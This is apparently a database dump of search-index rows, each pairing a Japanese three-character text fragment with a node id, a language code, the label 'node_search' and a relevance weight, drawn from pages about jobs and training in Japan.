('で多く', 190, 'ja', 'node_search', 0.876337),
('で多く', 194, 'ja', 'node_search', 0.854391),
('で多く', 197, 'ja', 'node_search', 0.879565),
('で始ま', 142, 'ja', 'node_search', 1),
('で学習', 181, 'ja', 'node_search', 0.792123),
('で学習', 182, 'ja', 'node_search', 0.802752),
('で学習', 183, 'ja', 'node_search', 0.740689),
('で安定', 163, 'ja', 'node_search', 1),
('で実務', 95, 'ja', 'node_search', 1),
('で実習', 136, 'ja', 'node_search', 0.779231),
('で少な', 18, 'ja', 'node_search', 1),
('で幅広', 133, 'ja', 'node_search', 1),
('で必要', 24, 'ja', 'node_search', 0.44024),
('で必要', 155, 'ja', 'node_search', 1),
('で必須', 140, 'ja', 'node_search', 0.923838),
('で新た', 164, 'ja', 'node_search', 1),
('で新た', 167, 'ja', 'node_search', 1),
('で新た', 169, 'ja', 'node_search', 1),
('で新た', 171, 'ja', 'node_search', 1),
('で新た', 173, 'ja', 'node_search', 0.980874),
('で新た', 174, 'ja', 'node_search', 1),
('で新た', 175, 'ja', 'node_search', 1),
('で新た', 176, 'ja', 'node_search', 1),
('で新た', 177, 'ja', 'node_search', 1),
('で日本', 24, 'ja', 'node_search', 0.746248),
('で日本', 156, 'ja', 'node_search', 28.9384),
('で日本', 157, 'ja', 'node_search', 1.83353),
('で最大', 23, 'ja', 'node_search', 1),
('で来る', 87, 'ja', 'node_search', 16),
('で正確', 87, 'ja', 'node_search', 0.687638),
('で求め', 18, 'ja', 'node_search', 3),
('で活躍', 188, 'ja', 'node_search', 1.89272),
('で活躍', 189, 'ja', 'node_search', 1),
('で活躍', 192, 'ja', 'node_search', 0.989021),
('で溶接', 8, 'ja', 'node_search', 27),
('で特定', 98, 'ja', 'node_search', 1),
('で理解', 3, 'ja', 'node_search', 1.0328),
('で知識', 195, 'ja', 'node_search', 1),
('で積み', 184, 'ja', 'node_search', 0.993146),
('で管理', 24, 'ja', 'node_search', 0.468115),
('で管理', 26, 'ja', 'node_search', 1),
('で組織', 27, 'ja', 'node_search', 1),
('で経験', 23, 'ja', 'node_search', 0.578643),
('で経験', 24, 'ja', 'node_search', 1),
('で継続', 179, 'ja', 'node_search', 0.842342),
('で継続', 182, 'ja', 'node_search', 1),
('で緊急', 30, 'ja', 'node_search', 3),
('で練習', 24, 'ja', 'node_search', 1),
('で能力', 23, 'ja', 'node_search', 0.434757),
('で行っ', 5, 'ja', 'node_search', 0.976851),
('で訓練', 23, 'ja', 'node_search', 0.561181),
('で輸入', 27, 'ja', 'node_search', 0.344129),
('で長期', 162, 'ja', 'node_search', 1.68961),
('で長期', 163, 'ja', 'node_search', 1),
('で雇用', 6, 'ja', 'node_search', 28),
('で電気', 10, 'ja', 'node_search', 28),
('で韓国', 3, 'ja', 'node_search', 0.76431),
('で韓国', 19, 'ja', 'node_search', 3),
('で食事', 133, 'ja', 'node_search', 1),
('で高い', 155, 'ja', 'node_search', 0.816452),
('という', 3, 'ja', 'node_search', 0.899454),
('という', 87, 'ja', 'node_search', 1.42725),
('という', 160, 'ja', 'node_search', 1),
('という', 166, 'ja', 'node_search', 1),
('という', 168, 'ja', 'node_search', 1),
('という', 170, 'ja', 'node_search', 1),
('という', 180, 'ja', 'node_search', 1),
('という', 186, 'ja', 'node_search', 1),
('という', 188, 'ja', 'node_search', 1),
('という', 189, 'ja', 'node_search', 2),
('という', 190, 'ja', 'node_search', 0.997306),
('という', 191, 'ja', 'node_search', 1),
('という', 192, 'ja', 'node_search', 1),
('という', 196, 'ja', 'node_search', 1),
('という', 199, 'ja', 'node_search', 1),
('といっ', 24, 'ja', 'node_search', 0.348983),
('とうご', 68, 'ja', 'node_search', 23),
('とうご', 69, 'ja', 'node_search', 1),
('とうご', 70, 'ja', 'node_search', 20),
('とうご', 71, 'ja', 'node_search', 2),
('とうご', 72, 'ja', 'node_search', 20),
('とうご', 73, 'ja', 'node_search', 20),
('とうご', 74, 'ja', 'node_search', 20),
('とうご', 75, 'ja', 'node_search', 47),
('とうご', 76, 'ja', 'node_search', 20),
('とうご', 77, 'ja', 'node_search', 26),
('とうご', 78, 'ja', 'node_search', 23),
('とうご', 80, 'ja', 'node_search', 25.9892),
('とうご', 81, 'ja', 'node_search', 23),
('とうご', 82, 'ja', 'node_search', 47),
('とうご', 83, 'ja', 'node_search', 1),
('とうご', 84, 'ja', 'node_search', 47),
('とうご', 85, 'ja', 'node_search', 23),
('とうご', 86, 'ja', 'node_search', 1),
('とうご', 88, 'ja', 'node_search', 1),
('とうご', 89, 'ja', 'node_search', 1),
('とうご', 90, 'ja', 'node_search', 47),
('とうご', 91, 'ja', 'node_search', 1),
('とうご', 92, 'ja', 'node_search', 1),
('とうご', 93, 'en', 'node_search', 2),
('とうご', 93, 'ja', 'node_search', 1),
('とうご', 96, 'ja', 'node_search', 20),
('とうご', 97, 'ja', 'node_search', 20),
('とうご', 99, 'ja', 'node_search', 20),
('とうご', 100, 'ja', 'node_search', 23),
('とうご', 101, 'ja', 'node_search', 20),
('とうご', 102, 'ja', 'node_search', 23),
('とうご', 103, 'ja', 'node_search', 20),
('とうご', 104, 'ja', 'node_search', 29),
('とうご', 105, 'ja', 'node_search', 1),
('とうご', 106, 'ja', 'node_search', 20),
('とうご', 107, 'ja', 'node_search', 20),
('とうご', 108, 'ja', 'node_search', 20),
('とうご', 109, 'ja', 'node_search', 23),
('とうご', 110, 'ja', 'node_search', 20),
('とうご', 111, 'ja', 'node_search', 19),
('とうご', 112, 'ja', 'node_search', 20),
('とうご', 113, 'ja', 'node_search', 1),
('とうご', 114, 'ja', 'node_search', 20),
('とうご', 115, 'ja', 'node_search', 20),
('とうご', 117, 'ja', 'node_search', 20),
('とうご', 118, 'ja', 'node_search', 20),
('とうご', 119, 'ja', 'node_search', 20),
('とうご', 121, 'ja', 'node_search', 20),
('とうご', 123, 'ja', 'node_search', 20),
('とうご', 124, 'ja', 'node_search', 20),
('とうご', 125, 'ja', 'node_search', 20),
('とうご', 127, 'ja', 'node_search', 19),
('とうご', 128, 'ja', 'node_search', 19),
('とうご', 129, 'ja', 'node_search', 19),
('とうご', 130, 'ja', 'node_search', 19),
('とうご', 131, 'ja', 'node_search', 20),
('とうご', 132, 'ja', 'node_search', 20),
('とうご', 134, 'ja', 'node_search', 20),
('とうご', 135, 'ja', 'node_search', 0.661163),
('とうご', 137, 'ja', 'node_search', 20),
('とうご', 139, 'ja', 'node_search', 20),
('とうご', 140, 'ja', 'node_search', 1),
('とうご', 141, 'ja', 'node_search', 20),
('とうご', 143, 'ja', 'node_search', 20),
('とうご', 144, 'ja', 'node_search', 20),
('とうご', 145, 'ja', 'node_search', 20),
('とうご', 146, 'ja', 'node_search', 20),
('とうご', 147, 'ja', 'node_search', 20),
('とうご', 148, 'ja', 'node_search', 20),
('とうご', 151, 'ja', 'node_search', 20),
('とうご', 152, 'en', 'node_search', 20),
('とうご', 152, 'ja', 'node_search', 20),
('とうご', 153, 'ja', 'node_search', 20),
('とうご', 161, 'ja', 'node_search', 0.797402),
('とうご', 166, 'ja', 'node_search', 0.784336),
('とうご', 168, 'ja', 'node_search', 0.771698),
('とうご', 170, 'ja', 'node_search', 0.757065),
('とうご', 181, 'ja', 'node_search', 4),
('とうご', 182, 'ja', 'node_search', 0.827757),
('とうご', 183, 'ja', 'node_search', 0.76188),
('とうご', 187, 'ja', 'node_search', 0.749958),
('とうご', 190, 'ja', 'node_search', 0.781775),
('とうご', 194, 'ja', 'node_search', 0.76431),
('とうご', 197, 'ja', 'node_search', 0.781775),
('とから', 122, 'ja', 'node_search', 1),
('とがで', 3, 'ja', 'node_search', 0.957226),
('とがで', 23, 'ja', 'node_search', 0.478227),
('とがで', 30, 'ja', 'node_search', 1.84234),
('とがで', 122, 'ja', 'node_search', 1),
('とがで', 136, 'ja', 'node_search', 0.754681),
('とがで', 138, 'ja', 'node_search', 0.892724),
('とがで', 147, 'ja', 'node_search', 1),
('とがで', 155, 'ja', 'node_search', 0.949597),
('とがで', 163, 'ja', 'node_search', 0.98493),
('とが今', 189, 'ja', 'node_search', 0.899454),
('とが大', 3, 'ja', 'node_search', 0.510357),
('とが必', 30, 'ja', 'node_search', 1.84234),
('とが最', 98, 'ja', 'node_search', 1),
('とが期', 193, 'ja', 'node_search', 0.899454),
('とが期', 195, 'ja', 'node_search', 0.961087),
('とが重', 3, 'ja', 'node_search', 0.530446),
('ときに', 87, 'ja', 'node_search', 16),
('とご活', 181, 'ja', 'node_search', 0.824901),
('とご活', 182, 'ja', 'node_search', 0.876337),
('とご活', 188, 'ja', 'node_search', 0.781775),
('とさら', 171, 'ja', 'node_search', 0.819249),
('とさら', 180, 'ja', 'node_search', 0.830633),
('とさら', 196, 'ja', 'node_search', 0.827757),
('とされ', 5, 'ja', 'node_search', 3),
('とされ', 24, 'ja', 'node_search', 0.437873),
('とした', 87, 'ja', 'node_search', 0.916736),
('とした', 140, 'ja', 'node_search', 20),
('とした', 162, 'ja', 'node_search', 1),
('とした', 163, 'ja', 'node_search', 1),
('として', 5, 'ja', 'node_search', 3.85746),
('として', 8, 'ja', 'node_search', 27),
('として', 23, 'ja', 'node_search', 0.909743),
('として', 24, 'ja', 'node_search', 0.745294),
('として', 27, 'ja', 'node_search', 0.336645),
('として', 80, 'ja', 'node_search', 1),
('として', 154, 'ja', 'node_search', 2.68299),
('として', 155, 'ja', 'node_search', 0.693594),
('として', 160, 'ja', 'node_search', 0.776703),
('として', 164, 'ja', 'node_search', 1.75231),
('として', 165, 'ja', 'node_search', 1.74996),
('として', 167, 'ja', 'node_search', 1.81645),
('として', 169, 'ja', 'node_search', 1.78691),
('として', 170, 'ja', 'node_search', 0.833529),
('として', 171, 'ja', 'node_search', 4.09677),
('として', 173, 'ja', 'node_search', 1.76188),
('として', 174, 'ja', 'node_search', 1.7185),
('として', 175, 'ja', 'node_search', 1.76431),
('として', 176, 'ja', 'node_search', 1.74069),
('として', 177, 'ja', 'node_search', 1.71),
('として', 179, 'ja', 'node_search', 0.876337),
('として', 184, 'ja', 'node_search', 1.75707),
('とだけ', 98, 'ja', 'node_search', 1),
('とって', 3, 'ja', 'node_search', 0.749958),
('とって', 135, 'ja', 'node_search', 0.794753),
('とって', 164, 'ja', 'node_search', 1),
('とって', 171, 'ja', 'node_search', 1),
('とって', 174, 'ja', 'node_search', 0.997306),
('とって', 177, 'ja', 'node_search', 1),
('とです', 138, 'ja', 'node_search', 0.657549),
('ととな', 164, 'ja', 'node_search', 1),
('ととな', 171, 'ja', 'node_search', 1),
('ととな', 177, 'ja', 'node_search', 1),
('ととな', 185, 'ja', 'node_search', 0.976851),
('ととも', 27, 'ja', 'node_search', 0.584241),
('ととも', 69, 'ja', 'node_search', 0.980874),
('ととも', 160, 'ja', 'node_search', 0.896076),
('ととも', 161, 'ja', 'node_search', 0.949597),
('ととも', 164, 'ja', 'node_search', 0.923838),
('ととも', 165, 'ja', 'node_search', 0.879565),
('ととも', 166, 'ja', 'node_search', 0.934703),
('ととも', 168, 'ja', 'node_search', 0.938382),
('ととも', 170, 'ja', 'node_search', 0.949597),
('ととも', 179, 'ja', 'node_search', 1.7767),
('ととも', 180, 'ja', 'node_search', 0.854391),
('ととも', 181, 'ja', 'node_search', 0.857458),
('ととも', 185, 'ja', 'node_search', 0.813674),
('ととも', 186, 'ja', 'node_search', 0.802752),
('ととも', 188, 'ja', 'node_search', 0.810915),
('ととも', 189, 'ja', 'node_search', 0.827757),
('ととも', 191, 'ja', 'node_search', 0.863659),
('ととも', 192, 'ja', 'node_search', 0.827757),
('ととも', 193, 'ja', 'node_search', 0.845322),
('ととも', 195, 'ja', 'node_search', 0.876337),
('ととも', 196, 'ja', 'node_search', 0.851346),
('ととも', 198, 'ja', 'node_search', 0.827757),
('ととも', 199, 'ja', 'node_search', 0.827757),
('とどま', 197, 'ja', 'node_search', 1),
('となく', 136, 'ja', 'node_search', 0.892724),
('となり', 5, 'ja', 'node_search', 1),
('となり', 160, 'ja', 'node_search', 0.989021),
('となり', 161, 'ja', 'node_search', 1),
('となり', 164, 'ja', 'node_search', 1.86995),
('となり', 165, 'ja', 'node_search', 0.949597),
('となり', 168, 'ja', 'node_search', 0.997306),
('となり', 170, 'ja', 'node_search', 1),
('となり', 171, 'ja', 'node_search', 1),
('となり', 174, 'ja', 'node_search', 1.75118),
('となり', 177, 'ja', 'node_search', 1),
('となり', 178, 'ja', 'node_search', 1),
('となり', 180, 'ja', 'node_search', 1),
('となり', 181, 'ja', 'node_search', 0.902857),
('となり', 185, 'ja', 'node_search', 1.97286),
('となり', 187, 'ja', 'node_search', 1),
('となり', 191, 'ja', 'node_search', 0.906287),
('となり', 192, 'ja', 'node_search', 0.869951),
('となり', 193, 'ja', 'node_search', 1),
('となり', 196, 'ja', 'node_search', 1),
('となり', 198, 'ja', 'node_search', 1),
('となり', 199, 'ja', 'node_search', 1),
('となる', 25, 'ja', 'node_search', 1),
('となる', 154, 'ja', 'node_search', 0.931053),
('となる', 155, 'ja', 'node_search', 1),
('となる', 156, 'ja', 'node_search', 1),
('となる', 157, 'ja', 'node_search', 0.968904),
('となる', 164, 'ja', 'node_search', 1),
('となる', 165, 'ja', 'node_search', 0.830633),
('となる', 166, 'ja', 'node_search', 0.819249),
('となる', 168, 'ja', 'node_search', 0.805455),
('となる', 170, 'ja', 'node_search', 0.78951),
('となる', 171, 'ja', 'node_search', 1.86995),
('となる', 177, 'ja', 'node_search', 1),
('となる', 178, 'ja', 'node_search', 0.873132),
('となる', 185, 'ja', 'node_search', 0.771698),
('となる', 187, 'ja', 'node_search', 0.797402),
('となる', 189, 'ja', 'node_search', 0.774192),
('となる', 197, 'ja', 'node_search', 1),
('となる', 199, 'ja', 'node_search', 0.779231),
('とにな', 68, 'ja', 'node_search', 1),
('とにな', 144, 'ja', 'node_search', 1),
('とに尽', 23, 'ja', 'node_search', 0.416268),
('とに尽', 136, 'ja', 'node_search', 0.653974),
('とに注', 135, 'ja', 'node_search', 1),
('とに目', 26, 'ja', 'node_search', 1),
('とのつ', 24, 'ja', 'node_search', 0.370453),
('との協', 28, 'ja', 'node_search', 28),
('との連', 24, 'ja', 'node_search', 0.343651),
('とは一', 98, 'ja', 'node_search', 1),
('とは問', 3, 'ja', 'node_search', 1),
('とは異', 162, 'ja', 'node_search', 0.993146),
('とまで', 122, 'ja', 'node_search', 1),
('とめ漢', 62, 'ja', 'node_search', 0.558589),
('ともに', 27, 'ja', 'node_search', 0.582831),
('ともに', 69, 'ja', 'node_search', 0.976851),
('ともに', 160, 'ja', 'node_search', 0.892724),
('ともに', 161, 'ja', 'node_search', 0.945829),
('ともに', 164, 'ja', 'node_search', 0.920273),
('ともに', 165, 'ja', 'node_search', 0.876337),
('ともに', 166, 'ja', 'node_search', 0.931053),
('ともに', 168, 'ja', 'node_search', 0.934703),
('ともに', 170, 'ja', 'node_search', 0.945829),
('ともに', 179, 'ja', 'node_search', 1.7767),
('ともに', 180, 'ja', 'node_search', 0.851346),
('ともに', 181, 'ja', 'node_search', 0.854391),
('ともに', 185, 'ja', 'node_search', 0.810915),
('ともに', 186, 'ja', 'node_search', 0.800068),
('ともに', 188, 'ja', 'node_search', 0.808176),
('ともに', 189, 'ja', 'node_search', 0.824901),
('ともに', 191, 'ja', 'node_search', 0.860547),
('ともに', 192, 'ja', 'node_search', 0.824901),
('ともに', 193, 'ja', 'node_search', 0.842342),
('ともに', 195, 'ja', 'node_search', 0.873132),
('ともに', 196, 'ja', 'node_search', 0.848323),
('ともに', 198, 'ja', 'node_search', 0.824901),
('ともに', 199, 'ja', 'node_search', 0.824901),
('とをお', 80, 'ja', 'node_search', 1),
('とをお', 161, 'ja', 'node_search', 1),
('とをお', 166, 'ja', 'node_search', 1),
('とをお', 168, 'ja', 'node_search', 1),
('とをお', 170, 'ja', 'node_search', 1),
('とをお', 177, 'ja', 'node_search', 0.733888),
('とをお', 178, 'ja', 'node_search', 1),
('とをお', 180, 'ja', 'node_search', 1),
('とをお', 181, 'ja', 'node_search', 1),
('とをお', 182, 'ja', 'node_search', 1),
('とをお', 183, 'ja', 'node_search', 1),
('とをお', 185, 'ja', 'node_search', 1),
('とをお', 186, 'ja', 'node_search', 1),
('とをお', 187, 'ja', 'node_search', 1),
('とをお', 188, 'ja', 'node_search', 1),
('とをお', 189, 'ja', 'node_search', 1),
('とをお', 190, 'ja', 'node_search', 1),
('とをお', 191, 'ja', 'node_search', 1),
('とをお', 192, 'ja', 'node_search', 1),
('とをお', 193, 'ja', 'node_search', 1),
('とをお', 194, 'ja', 'node_search', 1),
('とをお', 195, 'ja', 'node_search', 1),
('とをお', 196, 'ja', 'node_search', 1),
('とをお', 197, 'ja', 'node_search', 1),
('とをお', 198, 'ja', 'node_search', 1),
('とをお', 199, 'ja', 'node_search', 1),
('とをご', 154, 'ja', 'node_search', 1),
('とをご', 160, 'ja', 'node_search', 1),
('とをご', 164, 'ja', 'node_search', 1),
('とをご', 165, 'ja', 'node_search', 1),
('とをご', 167, 'ja', 'node_search', 1),
('とをご', 169, 'ja', 'node_search', 1),
('とをご', 171, 'ja', 'node_search', 1),
('とをご', 173, 'ja', 'node_search', 1),
('とをご', 174, 'ja', 'node_search', 1),
('とをご', 175, 'ja', 'node_search', 1),
('とをご', 176, 'ja', 'node_search', 1),
('とをご', 177, 'ja', 'node_search', 1),
('とをご', 184, 'ja', 'node_search', 1),
('とをよ', 87, 'ja', 'node_search', 0.98493),
('とをス', 156, 'ja', 'node_search', 1),
('とをス', 157, 'ja', 'node_search', 0.892724),
('とを保', 136, 'ja', 'node_search', 0.830633),
('とを大', 188, 'ja', 'node_search', 0.876337),
('とを心', 98, 'ja', 'node_search', 1),
('とを心', 167, 'ja', 'node_search', 0.916736),
('とを心', 169, 'ja', 'node_search', 0.889397),
('とを心', 171, 'ja', 'node_search', 0.866793),
('とを心', 173, 'ja', 'node_search', 0.854391),
('とを心', 174, 'ja', 'node_search', 0.797402),
('とを心', 175, 'ja', 'node_search', 0.860547),
('とを心', 176, 'ja', 'node_search', 0.913226),
('とを心', 177, 'ja', 'node_search', 0.78951),
('とを心', 178, 'ja', 'node_search', 0.863659),
('とを心', 183, 'ja', 'node_search', 0.794753),
('とを心', 184, 'ja', 'node_search', 0.786915),
('とを心', 187, 'ja', 'node_search', 0.78951),
('とを心', 190, 'ja', 'node_search', 0.824901),
('とを心', 194, 'ja', 'node_search', 0.805455),
('とを心', 197, 'ja', 'node_search', 0.827757),
('とを目', 135, 'ja', 'node_search', 0.689612),
('とを目', 155, 'ja', 'node_search', 0.7017),
('とを確', 116, 'ja', 'node_search', 1),
('とを願', 154, 'ja', 'node_search', 0.869951),
('とを願', 164, 'ja', 'node_search', 0.833529),
('とを願', 165, 'ja', 'node_search', 0.822065),
('とを願', 166, 'ja', 'node_search', 0.810915),
('とを願', 168, 'ja', 'node_search', 0.797402),
('とを願', 170, 'ja', 'node_search', 0.781775),
('とを願', 185, 'ja', 'node_search', 0.766757),
('とを願', 189, 'ja', 'node_search', 0.766757),
('とを願', 199, 'ja', 'node_search', 0.771698),
('とサー', 27, 'ja', 'node_search', 5.16839),
('とネピ', 27, 'ja', 'node_search', 0.96498),
('と仕事', 80, 'ja', 'node_search', 1),
('と仕事', 154, 'ja', 'node_search', 0.980874),
('と仕事', 164, 'ja', 'node_search', 0.902857),
('と仕事', 165, 'ja', 'node_search', 0.860547),
('と仕事', 171, 'ja', 'node_search', 0.902857),
('と仕事', 174, 'ja', 'node_search', 0.879565),
('と仕事', 175, 'ja', 'node_search', 0.968904),
('と仕事', 177, 'ja', 'node_search', 0.899454),
('と候補', 25, 'ja', 'node_search', 1),
('と健康', 111, 'ja', 'node_search', 1),
('と健康', 113, 'ja', 'node_search', 1),
('と充実', 169, 'ja', 'node_search', 0.839384),
('と充実', 176, 'ja', 'node_search', 0.851346),
('と前向', 194, 'ja', 'node_search', 0.997306),
('と前向', 197, 'ja', 'node_search', 0.989021),
('と努力', 165, 'ja', 'node_search', 0.993146),
('と努力', 186, 'ja', 'node_search', 1),
('と努力', 195, 'ja', 'node_search', 1),
('と労働', 26, 'ja', 'node_search', 1),
('と学習', 27, 'ja', 'node_search', 0.771698),
('と学習', 179, 'ja', 'node_search', 1),
('と実技', 138, 'ja', 'node_search', 19),
('と専門', 27, 'ja', 'node_search', 0.43709),
('と将来', 197, 'ja', 'node_search', 1),
('と建設', 27, 'ja', 'node_search', 0.899454),
('と成功', 140, 'ja', 'node_search', 0.794753),
('と成功', 169, 'ja', 'node_search', 0.920273),
('と成長', 164, 'ja', 'node_search', 0.854391),
('と成長', 185, 'ja', 'node_search', 0.938382),
('と成長', 194, 'ja', 'node_search', 0.836446),
('と手を', 62, 'ja', 'node_search', 1),
('と指導', 120, 'ja', 'node_search', 1),
('と挑戦', 174, 'ja', 'node_search', 0.96498),
('と提携', 62, 'ja', 'node_search', 0.774192),
('と提携', 142, 'ja', 'node_search', 0.876337),
('と日本', 28, 'ja', 'node_search', 3),
('と日本', 156, 'ja', 'node_search', 1),
('と日本', 157, 'ja', 'node_search', 1),
('と日本', 160, 'ja', 'node_search', 1.67541),
('と日本', 161, 'ja', 'node_search', 1.75966),
('と日本', 166, 'ja', 'node_search', 0.906287),
('と日本', 168, 'ja', 'node_search', 0.909743),
('と日本', 170, 'ja', 'node_search', 0.920273),
('と日本', 179, 'ja', 'node_search', 1.68572),
('と日本', 191, 'ja', 'node_search', 0.839384),
('と日本', 193, 'ja', 'node_search', 0.822065),
('と日本', 195, 'ja', 'node_search', 0.851346),
('と日本', 198, 'ja', 'node_search', 0.808176),
('と明る', 167, 'ja', 'node_search', 0.957226),
('と明る', 192, 'ja', 'node_search', 0.805455),
('と永続', 25, 'ja', 'node_search', 1),
('と活躍', 199, 'ja', 'node_search', 0.886095),
('と準備', 133, 'ja', 'node_search', 0.745294),
('と準備', 169, 'ja', 'node_search', 1),
('と準備', 174, 'ja', 'node_search', 1),
('と準備', 175, 'ja', 'node_search', 1),
('と準備', 177, 'ja', 'node_search', 0.942091),
('と準備', 178, 'ja', 'node_search', 1),
('と準備', 184, 'ja', 'node_search', 0.953396),
('と準備', 185, 'ja', 'node_search', 1),
('と準備', 187, 'ja', 'node_search', 1),
('と準備', 190, 'ja', 'node_search', 1),
('と準備', 199, 'ja', 'node_search', 0.98493),
('と熱心', 160, 'ja', 'node_search', 1),
('と熱心', 161, 'ja', 'node_search', 1),
('と熱心', 168, 'ja', 'node_search', 1),
('と熱心', 170, 'ja', 'node_search', 1),
('と熱意', 179, 'ja', 'node_search', 1),
('と熱意', 188, 'ja', 'node_search', 1),
('と熱意', 198, 'ja', 'node_search', 1),
('と献身', 135, 'ja', 'node_search', 0.833529),
('と理解', 30, 'ja', 'node_search', 1.84234),
('と生活', 177, 'ja', 'node_search', 0.757065),
('と生活', 184, 'ja', 'node_search', 0.808176),
('と粘り', 196, 'ja', 'node_search', 1),
('と素晴', 174, 'ja', 'node_search', 0.833529),
('と経験', 10, 'ja', 'node_search', 1),
('と経験', 62, 'ja', 'node_search', 1),
('と経験', 136, 'ja', 'node_search', 1),
('と経験', 192, 'ja', 'node_search', 0.902857),
('と継続', 166, 'ja', 'node_search', 1),
('と継続', 180, 'ja', 'node_search', 1),
('と継続', 181, 'ja', 'node_search', 1),
('と継続', 192, 'ja', 'node_search', 1),
('と継続', 199, 'ja', 'node_search', 1),
('と良い', 3, 'ja', 'node_search', 0.781775),
('と行い', 23, 'ja', 'node_search', 0.800068),
('と規律', 122, 'ja', 'node_search', 1),
('と記念', 20, 'ja', 'node_search', 31),
('と関連', 138, 'ja', 'node_search', 0.934703),
('どで働', 24, 'ja', 'node_search', 0.566439),
('どで勤', 24, 'ja', 'node_search', 0.819249),
('どに興', 24, 'ja', 'node_search', 0.646943),
('どに関', 24, 'ja', 'node_search', 0.375535),
('どの慈', 27, 'ja', 'node_search', 0.529288),
('どの経', 8, 'ja', 'node_search', 2),
('どまら', 197, 'ja', 'node_search', 1),
('どもた', 126, 'ja', 'node_search', 1),
('ども授', 24, 'ja', 'node_search', 0.76188),
('どんな', 87, 'ja', 'node_search', 1),
('ど将来', 183, 'ja', 'node_search', 0.957226),
('ど必要', 24, 'ja', 'node_search', 0.550958),
('ないこ', 98, 'ja', 'node_search', 1),
('ないで', 3, 'ja', 'node_search', 0.729424),
('ないよ', 24, 'ja', 'node_search', 0.521322),
('ないよ', 26, 'ja', 'node_search', 1),
('ない事', 24, 'ja', 'node_search', 0.525844),
('ない会', 25, 'ja', 'node_search', 1),
('ない会', 26, 'ja', 'node_search', 1),
('ない励', 120, 'ja', 'node_search', 1),
('ない場', 3, 'ja', 'node_search', 0.516879),
('なかっ', 3, 'ja', 'node_search', 0.574516),
('ながら', 23, 'ja', 'node_search', 0.497805),
('ながら', 80, 'ja', 'node_search', 1),
('ながら', 140, 'ja', 'node_search', 0.98493),
('ながら', 163, 'ja', 'node_search', 1),
('ながら', 175, 'ja', 'node_search', 0.913226),
('ながら', 176, 'ja', 'node_search', 0.942091),
('ながら', 177, 'ja', 'node_search', 0.827757),
('ながら', 184, 'ja', 'node_search', 0.839384),
('ながら', 190, 'ja', 'node_search', 0.848323),
('ながら', 195, 'ja', 'node_search', 1),
('ながら', 197, 'ja', 'node_search', 0.851346),
('ながり', 24, 'ja', 'node_search', 0.36879),
('ながり', 178, 'ja', 'node_search', 0.968904),
('ながり', 189, 'ja', 'node_search', 0.873132),
('ながり', 194, 'ja', 'node_search', 0.902857),
('ながり', 197, 'ja', 'node_search', 0.896076),
('ながる', 164, 'ja', 'node_search', 0.839384),
('ながる', 192, 'ja', 'node_search', 0.886095),
('ながる', 193, 'ja', 'node_search', 0.913226),
('なき成', 62, 'ja', 'node_search', 0.876337),
('なくと', 3, 'ja', 'node_search', 1),
('なくと', 18, 'ja', 'node_search', 1),
('なくな', 142, 'ja', 'node_search', 0.797402),
('なく就', 133, 'ja', 'node_search', 0.72066),
('なく日', 24, 'ja', 'node_search', 0.781775),
('なく活', 136, 'ja', 'node_search', 0.889397),
('なぐ架', 160, 'ja', 'node_search', 0.78951),
('なけれ', 18, 'ja', 'node_search', 0.920273),
('なぜな', 3, 'ja', 'node_search', 1),
('なたが', 98, 'ja', 'node_search', 1),
('なたの', 62, 'ja', 'node_search', 1.64292),
('なたは', 120, 'ja', 'node_search', 1),
('なたを', 62, 'ja', 'node_search', 0.913226),
('なたを', 69, 'ja', 'node_search', 0.961087),
('などで', 24, 'ja', 'node_search', 1.3885),
('などに', 24, 'ja', 'node_search', 1.02422),
('などの', 8, 'ja', 'node_search', 2),
('などの', 27, 'ja', 'node_search', 0.530446),
('なども', 24, 'ja', 'node_search', 0.76431),
('など将', 183, 'ja', 'node_search', 0.961087),
('など必', 24, 'ja', 'node_search', 0.552215),
('なの日', 62, 'ja', 'node_search', 0.597248),
('なりま', 5, 'ja', 'node_search', 1),
('なりま', 18, 'ja', 'node_search', 0.906287),
('なりま', 23, 'ja', 'node_search', 0.76188),
('なりま', 68, 'ja', 'node_search', 1),
('なりま', 142, 'ja', 'node_search', 0.792123),
('なりま', 144, 'ja', 'node_search', 1),
('なりま', 160, 'ja', 'node_search', 0.98493),
('なりま', 161, 'ja', 'node_search', 1),
('なりま', 165, 'ja', 'node_search', 0.945829),
('なりま', 168, 'ja', 'node_search', 0.993146),
('なりま', 170, 'ja', 'node_search', 1),
('なりま', 174, 'ja', 'node_search', 0.899454),
('なりま', 178, 'ja', 'node_search', 1),
('なりま', 180, 'ja', 'node_search', 1),
('なりま', 181, 'ja', 'node_search', 0.899454),
('なりま', 185, 'ja', 'node_search', 1.97286),
('なりま', 187, 'ja', 'node_search', 1),
('なりま', 191, 'ja', 'node_search', 0.902857),
('なりま', 192, 'ja', 'node_search', 0.866793),
('なりま', 193, 'ja', 'node_search', 1),
('なりま', 196, 'ja', 'node_search', 1),
('なりま', 198, 'ja', 'node_search', 1),
('なりま', 199, 'ja', 'node_search', 1),
('なるこ', 25, 'ja', 'node_search', 1),
('なるこ', 26, 'ja', 'node_search', 1),
('なるこ', 165, 'ja', 'node_search', 0.827757),
('なるこ', 166, 'ja', 'node_search', 0.816452),
('なるこ', 168, 'ja', 'node_search', 0.802752),
('なるこ', 170, 'ja', 'node_search', 0.786915),
('なるこ', 171, 'ja', 'node_search', 0.869951),
('なるこ', 178, 'ja', 'node_search', 0.869951),
('なるこ', 185, 'ja', 'node_search', 0.769219),
('なるこ', 187, 'ja', 'node_search', 0.794753),
('なるこ', 189, 'ja', 'node_search', 0.771698),
('なるこ', 199, 'ja', 'node_search', 0.776703),
('なるご', 161, 'ja', 'node_search', 0.774192),
('なるご', 178, 'ja', 'node_search', 0.816452),
('なるご', 186, 'ja', 'node_search', 0.792123),
('なるよ', 156, 'ja', 'node_search', 1),
('なるよ', 157, 'ja', 'node_search', 0.96498),
('なるビ', 87, 'ja', 'node_search', 0.662985),
('なる仕', 69, 'ja', 'node_search', 1),
('なる大', 197, 'ja', 'node_search', 1),
('なる成', 113, 'ja', 'node_search', 1),
('なる成', 171, 'ja', 'node_search', 0.810915),
('なる成', 180, 'ja', 'node_search', 0.822065),
('なる成', 181, 'ja', 'node_search', 0.836446),
('なる成', 192, 'ja', 'node_search', 0.916736),
('なる成', 193, 'ja', 'node_search', 0.934703),
('なる成', 196, 'ja', 'node_search', 0.819249),
('なる成', 199, 'ja', 'node_search', 0.899454),
('なる日', 182, 'ja', 'node_search', 0.889397),
('なる目', 183, 'ja', 'node_search', 0.860547),
('なる知', 155, 'ja', 'node_search', 1),
('なる素', 154, 'ja', 'node_search', 0.927431),
('なる素', 164, 'ja', 'node_search', 1),
('なる素', 171, 'ja', 'node_search', 1),
('なる素', 177, 'ja', 'node_search', 1),
('なる経', 95, 'ja', 'node_search', 19),
